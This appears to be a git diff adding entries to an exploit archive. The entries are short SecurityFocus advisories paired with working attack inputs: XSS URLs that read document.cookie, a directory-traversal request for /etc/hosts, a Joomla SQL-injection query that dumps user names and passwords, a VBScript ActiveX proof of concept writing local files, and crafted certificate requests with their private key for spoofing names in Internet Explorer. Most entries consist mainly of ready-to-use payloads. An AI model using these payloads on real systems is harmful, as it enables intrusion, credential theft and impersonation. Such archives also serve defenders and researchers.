bypass the 'CAPTCHA' security mechanism. This may lead to other attacks. + +The attacker could exploit the cross-site scripting issues to execute arbitrary script code in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +http://www.example.com/search.php?in=%27%3Cscript%3Ealert(document.cookie)%3C/script%3E http://www.example.com/search.php?ex=%27%3Cscript%3Ealert(document.cookie)%3C/script%3E http://www.example.com/search.php?ep=%27%3Cscript%3Ealert(document.cookie)%3C/script%3E http://www.example.com/search.php?be=%27%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/33262.txt b/platforms/php/webapps/33262.txt new file mode 100755 index 000000000..33e9c3a48 --- /dev/null +++ b/platforms/php/webapps/33262.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/36541/info + +Interspire Knowledge Manager is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data. + +Exploiting the issue may allow an attacker to obtain sensitive information that could aid in further attacks. + +Knowledge Manager 5 is vulnerable; other versions may also be affected. + +The following example URI is available: + +http://www.example.com/admin/de/dialog/file_manager.php?w=&p=/../../../../../../../../../../../../../etc/hosts \ No newline at end of file diff --git a/platforms/php/webapps/33266.txt b/platforms/php/webapps/33266.txt new file mode 100755 index 000000000..4c4336047 --- /dev/null +++ b/platforms/php/webapps/33266.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/36598/info + +The CB Resume Builder ('com_cbresumebuilder') component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +The following example URI is available: + +http://www.example.com/index.php?option=com_cbresumebuilder&task=group_members&group_id=-666+union+all+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+jos_users-- \ No newline at end of file diff --git a/platforms/php/webapps/33267.txt b/platforms/php/webapps/33267.txt new file mode 100755 index 000000000..7a7d5b581 --- /dev/null +++ b/platforms/php/webapps/33267.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/36601/info + +X-Cart is prone to a cross-site scripting vulnerability in the email subscription component because the application fails to sufficiently sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +http://www.example.com/[path]/customer/home.php?mode=subscribed&email= +http://www.example.com/[path]/customer/home.php?mode=subscribed&email=<script>alert(document.cookie);//<</script> +http://www.example.com/[path]/customer/home.php?mode=subscribed&email=<iframe src=http://www.google.com.br width=800> \ No newline at end of file diff --git a/platforms/windows/remote/33172.txt b/platforms/windows/remote/33172.txt new file mode 100755 index 000000000..96eb9e2d6 --- /dev/null +++ b/platforms/windows/remote/33172.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/36061/info + +Source Engine is prone to a format-string vulnerability because it fails to properly sanitize user-supplied input before passing it as the format specifier to a formatted-printing function. + +An attacker may exploit this issue to execute arbitrary code in the context of the vulnerable application. Failed exploit attempts will likely result in a denial-of-service condition. + +Source Engine 3968 and prior builds are affected. + +http://www.exploit-db.com/sploits/33172-1.zip +http://www.exploit-db.com/sploits/33172-2.zip \ No newline at end of file diff --git a/platforms/windows/remote/33263.html b/platforms/windows/remote/33263.html new file mode 100755 index 000000000..401da97e7 --- /dev/null +++ b/platforms/windows/remote/33263.html @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/36566/info + +The EMC Captiva PixTools Distributed Imaging ActiveX control is prone to multiple insecure-method vulnerabilities that affect the PDIControl.PDI.1 ActiveX control (PDIControl.dll). + +Successfully exploiting these issues allows remote attackers to create or overwrite arbitrary local files, which may lead to arbitrary code execution. + +PDIControl.dll 2.2.3160.0 is vulnerable; other versions may also be affected. + +<object classid='clsid:00200338-3D33-4FFC-AC20-67AA234325F3' id='test'></object> <input language=VBScript onclick=tryMe() type=button value='Click here to start the test'> <script language='vbscript'> Sub tryMe test.SetLogLevel 1 test.SetLogFileName "c:\some.txt" test.WriteToLog 1, "Hello World!" End Sub </script> + + + diff --git a/platforms/windows/remote/33264.txt b/platforms/windows/remote/33264.txt new file mode 100755 index 000000000..dcf77957f --- /dev/null +++ b/platforms/windows/remote/33264.txt @@ -0,0 +1,49 @@ +source: http://www.securityfocus.com/bid/36577/info + +Microsoft Internet Explorer is a browser available for Microsoft Windows. + +Internet Explorer is prone to multiple security-bypass vulnerabilities because it fails to properly handle encoded values in X.509 certificates. Specifically, it fails to properly distinguish integer sequences that are then recognized as CN (common name) elements. + +Successful exploits allow attackers to perform man-in-the-middle attacks or impersonate trusted servers, which will aid in further attacks. + +PKCS#10 Request with Leading Zeroes: +-----BEGIN CERTIFICATE REQUEST----- +MIIBoTCCAQoCAQAwYTETMBEGA1UEChMKQmFkZ3V5IEluYzEXMBUGA1UEAxMOd3d3 +LmJhZGd1eS5jb20xGTAXBgNVBAsTEEhhY2tpbmcgRGl2aXNpb24xFjAUBgRVBIAD +Ewx3d3cuYmFuay5jb20wgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBANmLyxoJ +hdDkywSs9J2E70fg5Z2Wou29jKgCDPSFBKTH6syTzWArF84mF4B7a/3aPaaSTwYQ +43siBhDkqYAanZFiLcZS6KVB53/FSsJwzz4+CpDcl7ky5utF/6Yfv86408PpFJvv +5FWLLYBjLkyKE7ru5aMQqqnlZQIHOZc06VIZAgMBAAGgADANBgkqhkiG9w0BAQQF +AAOBgQAt9IeKCGIK6WZRP7tcuAZoQBWbxXpASRozSSRWa5GRpLigTb69tggy7kyH +bVHsbR3uL5j9wObTaU0EzFLXRDW5R/fQy1SBJLo3S7VXKgSJisMP9rBbuUIgLK6f +tlLl4l4l8jJhYPSYkXge1wmyuXVnte53XGy67mBubATzWRk40w== +-----END CERTIFICATE REQUEST----- +PKCS#10 Request with 64 Bit Overflow: +-----BEGIN CERTIFICATE REQUEST----- +MIIBqjCCARMCAQAwajETMBEGA1UEChMKQmFkZ3V5IEluYzEXMBUGA1UEAxMOd3d3 +LmJhZGd1eS5jb20xGTAXBgNVBAsTEEhhY2tpbmcgRGl2aXNpb24xHzAdBg1VBIKA +gICAgICAgIADEwx3d3cuYmFuay5jb20wgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJ +AoGBANmLyxoJhdDkywSs9J2E70fg5Z2Wou29jKgCDPSFBKTH6syTzWArF84mF4B7 +a/3aPaaSTwYQ43siBhDkqYAanZFiLcZS6KVB53/FSsJwzz4+CpDcl7ky5utF/6Yf +v86408PpFJvv5FWLLYBjLkyKE7ru5aMQqqnlZQIHOZc06VIZAgMBAAGgADANBgkq +hkiG9w0BAQQFAAOBgQC5avxpz3cfAqmmi2JDAnYBEwzgZfjIAAldk5X8HAX7mB9/https://ww +w.defcon.org/ +77neRquSA5VhUQ8K8tdVQylBoaengqQrNpcWu/mTagm0RNaq3fBT6g9hmaGOHjli +zbuMfUaH5eMAubxxc04uHPcYShjFzTcIASG8jPJqwIM/CHsSBTG5VlJX8iFquA== +-----END CERTIFICATE REQUEST----- +Private Key For Above Requests: +-----BEGIN RSA PRIVATE KEY----- +MIICXgIBAAKBgQDZi8saCYXQ5MsErPSdhO9H4OWdlqLtvYyoAgz0hQSkx+rMk81g +KxfOJheAe2v92j2mkk8GEON7IgYQ5KmAGp2RYi3GUuilQed/xUrCcM8+PgqQ3Je5 +MubrRf+mH7/OuNPD6RSb7+RViy2AYy5MihO67uWjEKqp5WUCBzmXNOlSGQIDAQAB +AoGAGnnQ9hJCnvG5Y5BJFQKgvHa6eztiCN0QyUG2oeuubP+Hq+4xCIs2EnjAU3qx +4es1pZgY1fwoM0wowNWTa2vR0S5Sse0cVFoEzgOUNDE3bGyRRatjjZEFq6Q1oH3Y +MdW9B4bvFsU7wf6MbGmDWFGVMLmBfBlqnSMu324Nfm3xdAECQQDyuHD1XCEtHvcG ++SQnngLVs5d6nMnQsA06nEotBLrIe8QESmanOoSEtIsr25zNyUtr6QZqHaldOYK+ +SzWf+KWRAkEA5XLB/En3KtQWd+R/jmd8f8ef4IdbmAg+BChoayJPUbI2tyER97MV +xAUPN1SujN5C4B+cCz79hXk2+W5dnrOACQJBALO815EqVzsFiiJ0zkw0G59KrarT +fjN2m2VCpT8vGG4sEJyox9mgYM+wrrqcl0JghOR1HBXqvydU1je6lAxRYbECQQCE +QIw9riiQgCTfQE6ht1aUlGy7z2llDUMpxFzDe8g6b72H+sDPhGMEVGI740ylF6t2 +YeHgvZMFryOXzBycUBx5AkEAibS/zSPs08ix6LIaRYsok692TTqb49Cg+FuhJsx/ +eEegf1tZTACaCETRB1+edTW20MDwZukGs0WnZ9axgs/9PA== +-----END RSA PRIVATE KEY-----